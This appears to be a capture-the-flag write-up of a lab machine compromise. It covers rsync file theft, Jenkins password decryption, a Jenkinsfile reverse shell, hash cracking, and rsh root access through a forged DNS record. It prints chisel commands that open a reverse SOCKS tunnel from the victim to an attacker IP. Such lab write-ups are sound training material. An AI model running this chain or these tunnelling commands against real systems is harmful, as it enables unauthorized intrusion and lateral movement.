Enumeration

Nmap

Initial nmap scan revealed Rsync, Rlogin, Port 3000 (HTTP), SSH, DNS ports were open and MySQL port was filtered.

00 - nmap

Web Enumeration

Website was gitea. The version was not vulnerable.

01 - gitea

There was a user named buildadm and a dev repo which included a Jenkins file.

02 - Jenkinsfile repo and nothing else

Rsync Enumeration

I did not know what to do with rsync. But checking the Rsync Pentesting documentation from Hackviser, I understood that it could be used to transfer files.

It can either be authenticated or unauthenticated. I checked if authentication was diabled. It was indeed disabled. I transfered jenkins backup files to my computer.

03 - rsync download

Jenkins Decryption

I searched through the internet to understand what to do with jenkins configuration files. I found out that there are encrypted user passwords. Searching through the internet I found jenkins-credential-decryptor tool. Using it revealed the password for buildadm user.

04 - decrypted

Jenkins File RevShell

I logged in using the buildadm user, then simply updated the Jenkinsfile and got the reverse shell.

05 - got the user flag

Privilege Escalation

Checking the environment, I understood that I was in a docker container as a root user. I could not run many commands. So at first I checked my IP address to find out docker container’s subnet. It was in a different subnet than host machine.

06 - IP check

.rhosts file

Then searching through the files, I found out .rhosts file. I did not know what to do with it. So I searched through the internet and found out this website.

Rhosts file is used to control remote logins through rsh or rlogin. In the current machine, Users on the intern.build.vl and admin.build.vl could login as root on the machine.

07 - 0 rhosts

Static Nmap

Keeping this information in mind, I downloaded static-nmap binary and transfered it with /etc/services file to the target container using curl.

Running it revealed the IPs and ports.

07 - static nmap output

Chisel

After running the nmap, I ran chisel to create a socks proxy using below steps:

  1. Update the /etc/proxychains4.conf

     #socks4 127.0.0.1 9050
 socks5  127.0.0.1 1080

  2. Set Reverse Listener on attacker site:

     chisel server --reverse --port 443

  3. Set client on the victim side:

     chisel.exe client 10.10.16.11:443 R:1080:socks

  4. Now we can access the internal network.

Then connected to mysql database.

08 - proxychains db

Checking the records, I found a password.

09 - cracked

Then using the hashcat, cracked the password.

10 - cracked real

Internal Web Enumeration

Now from the nmap output, we know there are some internal websites. At first I set socks proxy on firefox.

11 - set proxy

Then visited the website which revealed PowerDNS-Admins Website. Previously, I cracked the password inside the powerdnsadmins database, so I tried that credentials and logged in.

12 - admin

Rhosts

Previously, I found the .rhosts file inside the docker container. I may assume that same .rhosts file is present on the host domain. So if I update intern or add a new admin record which points to my attacker machine IP, I may login to the target host machine as root using rsh without password.

So I added an admin record which points to my host.

13 - rhosts

Then simply logged in and got the root flag.

14 - root txt

Pwned

The machine was compromised.

15 - pwned

<
Previous Post
EscapeTwo - Hack The Box
>
Next Post
Monitored - Hack The Box